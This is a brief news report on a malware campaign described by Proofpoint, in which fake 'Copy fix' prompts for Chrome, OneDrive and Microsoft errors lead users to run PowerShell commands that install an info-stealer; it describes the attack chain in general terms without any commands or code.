June 18, 2024 By Judy Sanhz
Hackers have devised a new, deceptive method to trick users into installing a malware named ClickFix, according to cybersecurity firm Proofpoint. The scheme involves enticing users with fake solutions to common errors in popular services such as Chrome, OneDrive, and Microsoft. Once users download and execute these “fixes” by clicking the Copy fix button, they unwittingly run a PowerShell or a Windows Run dialogue command that compromises their systems.
This dialogue installs a “root certificate” to flush the DNS cache, remove the clipboard content, show a fake message, and install an additional remote PowerShell script that does an anti-VM check before the info-stealer is installed. Various hacker groups, including those responsible for ClearFake, allegedly use this method. Proofpoint details how hackers exploit jeopardized sites by incorporating a malicious script handed over by Binance’s Smart Chain contract on the blockchain to spread malware and infect susceptible Windows computers.
